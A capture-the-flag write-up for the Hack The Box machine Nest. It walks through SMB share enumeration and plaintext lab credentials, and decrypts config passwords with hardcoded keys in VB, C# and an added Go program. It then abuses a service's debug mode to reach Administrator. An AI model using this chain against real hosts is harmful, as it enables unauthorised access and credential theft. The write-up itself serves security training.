
Hack The Box Writeup: Nest

Nest is a Windows box that saw the light of day on Hack The Box on January 25. It is a nice box where you are constantly exploring and taking one step further every time. There is a lot of discussion about the difficulty of this box: according to the maker it qualifies as “Easy”, but many find it somewhere between “Medium” and “Hard”.


[0x1] Reconnaissance & Enumeration

The first step in exploring Nest is an Nmap scan. I opt for a scan of the full port range (so non-standard ports are included), with the default scripts and service/version detection enabled.

nmap -sC -sV -p- -oA nest 10.10.10.178

A scan of the entire port range always takes a while. Eventually the results come in and show that ports 445/tcp and 4386/tcp are open. Port 445/tcp is SMB; 4386 is unknown to me, but according to the scan a database reporting service is running on it.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 19:51 GMT
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.33% done; ETC: 19:56 (0:03:55 remaining)
Stats: 0:05:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 19:57 (0:00:21 remaining)
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-26T19:59:26
|_ start_date: 2020-01-26T19:44:36

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 507.00 seconds

With the help of smbclient a number of shares emerge. Besides the standard ADMIN$, C$ and IPC$ there are a few interesting directories.

smbclient -L 10.10.10.178
Enter WORKGROUP\root's password: 

 Sharename Type Comment
 --------- ---- -------
 ADMIN$ Disk Remote Admin
 C$ Disk Default share
 Data Disk 
 IPC$ IPC Remote IPC
 Secure$ Disk 
 Users Disk 
SMB1 disabled -- no workgroup available

[0x2] Initial Foothold

Based on this list, I’m going to take a closer look at Data, Secure$ and Users to see if any interesting information can be found. An initial foothold is good, but a set of credentials is of course better.

The Users share contains a number of user folders. Presumably these are the users whose credentials can be found later. For now I lack the rights to view the folders, so I continue with Data.

smbclient  \\\\10.10.10.178\\users
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Sat Jan 25 23:04:21 2020
  ..                                  D        0  Sat Jan 25 23:04:21 2020
  Administrator                       D        0  Fri Aug  9 16:08:23 2019
  C.Smith                             D        0  Sun Jan 26 07:21:44 2020
  L.Frost                             D        0  Thu Aug  8 18:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 18:02:50 2019
  TempUser                            D        0  Wed Aug  7 23:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \> 

The Data share contains a number of nested folders and files. The recurse command is useful here to get a complete listing.

smbclient  \\\\10.10.10.178\\data
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Wed Aug  7 23:53:46 2019
  ..                                  D        0  Wed Aug  7 23:53:46 2019
  IT                                  D        0  Wed Aug  7 23:58:07 2019
  Production                          D        0  Mon Aug  5 22:53:38 2019
  Reports                             D        0  Mon Aug  5 22:53:44 2019
  Shared                              D        0  Wed Aug  7 20:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  .                                   D        0  Wed Aug  7 20:07:51 2019
  ..                                  D        0  Wed Aug  7 20:07:51 2019
  Maintenance                         D        0  Wed Aug  7 20:07:32 2019
  Templates                           D        0  Wed Aug  7 20:08:07 2019

\Shared\Maintenance
  .                                   D        0  Wed Aug  7 20:07:32 2019
  ..                                  D        0  Wed Aug  7 20:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 00:01:44 2019

\Shared\Templates
  .                                   D        0  Wed Aug  7 20:08:07 2019
  ..                                  D        0  Wed Aug  7 20:08:07 2019
  HR                                  D        0  Wed Aug  7 20:08:01 2019
  Marketing                           D        0  Wed Aug  7 20:08:06 2019

\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 20:08:01 2019
  ..                                  D        0  Wed Aug  7 20:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 23:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 20:08:06 2019
  ..                                  D        0  Wed Aug  7 20:08:06 2019
smb: \> 

Maintenance Alerts.txt and Welcome Email.txt look interesting for later.

The last share, Secure$, is accessible, but it is not possible to list files here. Maybe later, with a set of credentials.

smbclient  \\\\10.10.10.178\\secure$
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 

The file Maintenance Alerts.txt only contains a message that there is no maintenance, which is of no use to me. The second file is Welcome Email.txt, and there is something interesting to find here.

\shared\Templates\HR\> dir
  .                                   D        0  Wed Aug  7 20:08:01 2019
  ..                                  D        0  Wed Aug  7 20:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 23:55:36 2019

		10485247 blocks of size 4096. 6448917 blocks available

This gives me an initial foothold: a set of credentials for TempUser, a user previously seen on the Users share.

We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR

[0x3] Path to User flag

Armed with freshly discovered credentials, it’s time to reconnect to the Data share to see if it delivers more as TempUser.

The listing shows quite a few files in the IT\Configs folder which look like application configuration files.

smbclient -U TempUser  \\\\10.10.10.178\\data
Enter WORKGROUP\TempUser's password: 

\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 20:31:37 2019
  ..                                  D        0  Wed Aug  7 20:31:37 2019
  config.xml                          A     6451  Thu Aug  8 00:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 20:30:27 2019

\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 21:01:13 2019
  ..                                  D        0  Wed Aug  7 21:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 20:49:37 2019

		10485247 blocks of size 4096. 6448917 blocks available

After going through all the files I found a lot of noise and two interesting files. Enumeration is painstaking work, and before you know it you have missed essential information.

In the folder NotepadPlusPlus I find the file config.xml, which contains references to three other files. Remarkable is the path on the Secure$ share that I visited before without being able to see any folders. Now I do have a path where a folder Carl should be. Is the previously found user folder C.Smith Carl’s?

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>

The second interesting file is RU_config.xml in the RU Scanner folder. The contents of this XML file are a username and a password. A quick check indicates that the password is not directly usable and is probably encrypted.

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

Time to take a look at the path in the NotepadPlusPlus config file.

smbclient -U TempUser  \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Thu Aug  8 00:08:12 2019
  ..                                  D        0  Thu Aug  8 00:08:12 2019
  Finance                             D        0  Wed Aug  7 20:40:13 2019
  HR                                  D        0  Thu Aug  8 00:08:11 2019
  IT                                  D        0  Thu Aug  8 11:59:25 2019

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\HR
NT_STATUS_ACCESS_DENIED listing \HR\*

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

The path of the file should be \\HTB-NEST\Secure$\IT\Carl\Temp.txt. This kept me busy for a while before I simply tried to enter the directory despite the ACCESS_DENIED. As it turns out, TempUser does have the right to traverse IT, just not to list its files, and the Carl folder below it provides interesting new content.

smb: \IT\> cd Carl
smb: \IT\Carl\> recurse
smb: \IT\Carl\> dir
  .                                   D        0  Wed Aug  7 20:42:14 2019
  ..                                  D        0  Wed Aug  7 20:42:14 2019
  Docs                                D        0  Wed Aug  7 20:44:00 2019
  Reports                             D        0  Tue Aug  6 14:45:40 2019
  VB Projects                         D        0  Tue Aug  6 15:41:55 2019

		10485247 blocks of size 4096. 6448903 blocks available
smb: \IT\Carl\> 


RU Scanner was the folder that contained the encrypted password earlier. Here there appears to be a Microsoft Visual Studio project, which I download in its entirety to investigate further in Visual Studio. The expectation is that the encryption method can be found here, which would give a way to recover the plaintext password.

smb: \IT\Carl\VB Projects\WIP\RU\> dir
  .                                   D        0  Fri Aug  9 16:36:45 2019
  ..                                  D        0  Fri Aug  9 16:36:45 2019
  RUScanner                           D        0  Wed Aug  7 23:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 15:45:36 2019

		10485247 blocks of size 4096. 6448903 blocks available

After some tinkering with the project it soon became clear that the easiest way for me to retrieve the password is to call the decryption function below and simply write its output to the console.

In Module1.vb I add the line below so that the decrypted password is written to the console.

Console.WriteLine(Utils.DecryptString(Config.Password))

The total will then look like this:

Module Module1

    Sub Main()
        ' Load the RU_Config.xml copied from the Data share
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
        ' Write the decrypted password to the console
        Console.WriteLine(Utils.DecryptString(Config.Password))
    End Sub
End Module

The decryption function itself can be found in Utils.vb and takes the encrypted text, a passphrase, a salt, the number of password iterations, an initialisation vector (IV) and the key size.

The program runs and returns a string as the decrypted password. Looks plausible, doesn’t it?

xRxRxPANCAK3SxRxRx

This password works with the username C.Smith, and via smbclient I reconnect to the machine to continue searching.

The output shows some interesting things: user.txt and Debug Mode Password.txt.

smbclient -U "C.Smith"  \\\\10.10.10.178\\Users
Enter WORKGROUP\C.Smith's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Sat Jan 25 23:04:21 2020
  ..                                  D        0  Sat Jan 25 23:04:21 2020
  Administrator                       D        0  Fri Aug  9 16:08:23 2019
  C.Smith                             D        0  Sun Jan 26 07:21:44 2020
  L.Frost                             D        0  Thu Aug  8 18:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 18:02:50 2019
  TempUser                            D        0  Wed Aug  7 23:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                   D        0  Sun Jan 26 07:21:44 2020
  ..                                  D        0  Sun Jan 26 07:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 00:06:17 2019
  user.txt                            A       32  Fri Aug  9 00:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                   D        0  Fri Aug  9 00:06:17 2019
  ..                                  D        0  Fri Aug  9 00:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 13:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 00:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 00:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 13:18:42 2019
  ..                                  D        0  Fri Aug  9 13:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 00:41:16 2019
smb: \> 

user.txt does indeed contain the user flag, and with that the first part of this machine is in the pocket!

cat user.txt
cf71b25404be5d84fd827e05f426e987

[0x4] Path to Root flag

The Debug Mode Password.txt file is listed with a size of 0 bytes. After downloading, the file is indeed empty, which is strange. This is a Windows machine, and a frequently used way of hiding information in a file is an Alternate Data Stream (ADS): on NTFS a second, named stream of content is attached to the otherwise empty-looking file, and the directory listing only shows the size of the default stream.

With smbclient you can use the command allinfo to display additional information about a file. This is very likely a file with an ADS.

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
stream: [:Password:$DATA], 15 bytes

Gotcha! So there is a second stream hidden in the dummy file, and the data I need is in the stream called Password. I download it using the filename:streamname notation shown by allinfo.

get "Debug Mode Password.txt:Password"

Now the file is 15 bytes instead of 0 bytes. The file contains another password.

WBQ201953D8w

Because many files give hints towards reporting, it’s time to visit Nest’s second port. Port 4386 already returned several commands and basic information during the scan, so I connect to Nest on port 4386 with telnet.

Once connected to the service I give the command help and soon see the next step: there is a DEBUG command that requires a password.

telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Activating the debug mode based on the previously found password in the ADS is successful and now it is possible to execute additional commands.

>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

The list command shows that I am in the ALL QUERIES folder. There is nothing else of use here.

>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

After fiddling with the commands I find out that setdir .. goes back one directory, and list then displays the contents of that folder. Nothing in this folder is usable except for the LDAP folder.

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

In the LDAP folder I find an executable that I encountered earlier in Carl’s folder and a config file.

>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

By means of showquery <id> I can retrieve the contents of the file Ldap.conf, and there I find the username Administrator and its password. This looks encrypted just like before, and a quick check confirms it: in this form the password cannot be used to log in directly.

>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

I previously saved the Windows executable from Carl’s folder, and this is probably the program that creates or reads Ldap.conf and therefore also implements the encryption.

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 13:18:42 2019
  ..                                  D        0  Fri Aug  9 13:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 00:41:16 2019

Since this is a compiled executable, it took some googling to find a free tool that can provide insight into it. I used dotPeek from JetBrains. After opening the file I soon noticed similarities to the earlier Visual Basic project and quickly found the decryption function.

I couldn’t modify the executable itself to do the same trick as with the Visual Studio project. Instead I copied the relevant code to an online .NET compiler and added a call that feeds in the encrypted password and shows the outcome.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace HqkLdap
{
  public class CR
  {
    private const string K = "667912";
    private const string I = "1L1SA61493DRV53Z";
    private const string SA = "1313Rf99";

    public static string DS(string EncryptedString)
    {
      return string.IsNullOrEmpty(EncryptedString) ? string.Empty : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
    }
    private static string RD(
      string cipherText,
      string passPhrase,
      string saltValue,
      int passwordIterations,
      string initVector,
      int keySize)
    {
      byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
      byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
      byte[] buffer = Convert.FromBase64String(cipherText);
      byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked ((int) Math.Round(unchecked ((double) keySize / 8.0))));
      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
      cryptoServiceProvider.Mode = CipherMode.CBC;
      ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
      MemoryStream memoryStream = new MemoryStream(buffer);
      CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read);
      byte[] numArray = new byte[checked (buffer.Length + 1)];
      int count = cryptoStream.Read(numArray, 0, numArray.Length);
      memoryStream.Close();
      cryptoStream.Close();
      return Encoding.ASCII.GetString(numArray, 0, count);
    }

    // Entry point added to the copied code: decrypt the Password value from Ldap.conf
    public static void Main()
    {
      Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
    }
  }
}

The last line, shown separately below, is all it takes to decrypt the string and show the original password.

Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));

The result reads as a friendly “thanks for playing” from the box’s creator. Given the information in Ldap.conf, this is expected to be the Administrator password.

XtH4nkS4Pl4y1nGX
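As an added example (not the writeup’s or the box’s own code), the Go program below reproduces the decompiled routine end to end using only the standard library: it derives the AES key with PBKDF2-HMAC-SHA1 from the hardcoded passphrase and salt, decrypts the Ldap.conf value in CBC mode with the hardcoded IV, and validates the PKCS#7 padding so that a wrong key or a tampered value fails loudly instead of yielding garbage. It uses only the constants and the ciphertext quoted above; the lesson for a defender is that an “encrypted” config whose key material ships inside the same binary is no stronger than plaintext.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// Key material as recovered from the decompiled HqkLdap.exe quoted in the writeup.
const ldapPassPhrase, ldapSalt, ldapIV = "667912", "1313Rf99", "1L1SA61493DRV53Z"
const ldapIterations, ldapKeyBits = 3, 256

// pbkdf2SHA1 is a stdlib-only PBKDF2-HMAC-SHA1 (RFC 8018 section 5.2), which is what
// .NET's Rfc2898DeriveBytes(passPhrase, salt, iterations).GetBytes(n) computes.
func pbkdf2SHA1(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	var dk []byte
	var blockIndex [4]byte
	for i := 1; len(dk) < keyLen; i++ {
		binary.BigEndian.PutUint32(blockIndex[:], uint32(i))
		prf.Reset()
		prf.Write(salt)
		prf.Write(blockIndex[:])
		u := prf.Sum(nil)              // U_1 = PRF(P, S || INT(i))
		t := append([]byte(nil), u...) // T_i accumulates U_1 xor U_2 xor ...
		for c := 1; c < iterations; c++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil) // U_c = PRF(P, U_{c-1})
			for k := range t {
				t[k] ^= u[k]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:keyLen]
}

// hqkDecrypt mirrors CR.RD from the decompiled code: base64 ciphertext, AES-CBC under a
// PBKDF2-derived key with a fixed ASCII IV, then PKCS#7 unpadding (the .NET default).
func hqkDecrypt(cipherText, passPhrase, salt string, iterations int, iv string, keyBits int) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(cipherText)
	if err != nil {
		return "", err
	}
	if len(raw) == 0 || len(raw)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(passPhrase), []byte(salt), iterations, keyBits/8))
	if err != nil {
		return "", err
	}
	plain := make([]byte, len(raw))
	cipher.NewCBCDecrypter(block, []byte(iv)).CryptBlocks(plain, raw)
	// PKCS#7 check: the last byte is the pad length and every pad byte must carry that value.
	pad := int(plain[len(plain)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(plain[len(plain)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad PKCS#7 padding (wrong key, IV or tampered ciphertext)")
	}
	return string(plain[:len(plain)-pad]), nil
}

func main() {
	// The Password value from Ldap.conf as returned by SHOWQUERY 2.
	pw, err := hqkDecrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=",
		ldapPassPhrase, ldapSalt, ldapIterations, ldapIV, ldapKeyBits)
	fmt.Println(pw, err)
}
```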

With the newly acquired password I connect to the Users share with smbclient and go to the Administrator folder. There is one file, but you can already deduce from its name that this is not the final root flag.

smbclient -U "Administrator"  \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password: 

Try "help" to get a list of possible commands.

smb: \> cd Administrator
smb: \Administrator\> dir
  .                                   D        0  Fri Aug  9 16:08:23 2019
  ..                                  D        0  Fri Aug  9 16:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 16:10:15 2019

The shortcut points to the Administrator’s Desktop folder, which presumably contains root.txt.

\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt

A new connection to the C$ share and on to the Administrator’s Desktop for the root flag. Yep, at 32 bytes, root.txt contains the root flag!

smbclient -U "Administrator"  \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.

smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
  .                                  DR        0  Sun Jan 26 07:20:50 2020
  ..                                 DR        0  Sun Jan 26 07:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 22:02:44 2020
  root.txt                            A       32  Mon Aug  5 23:27:26 2019

		10485247 blocks of size 4096. 6449467 blocks available


All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!


d0p4m1n3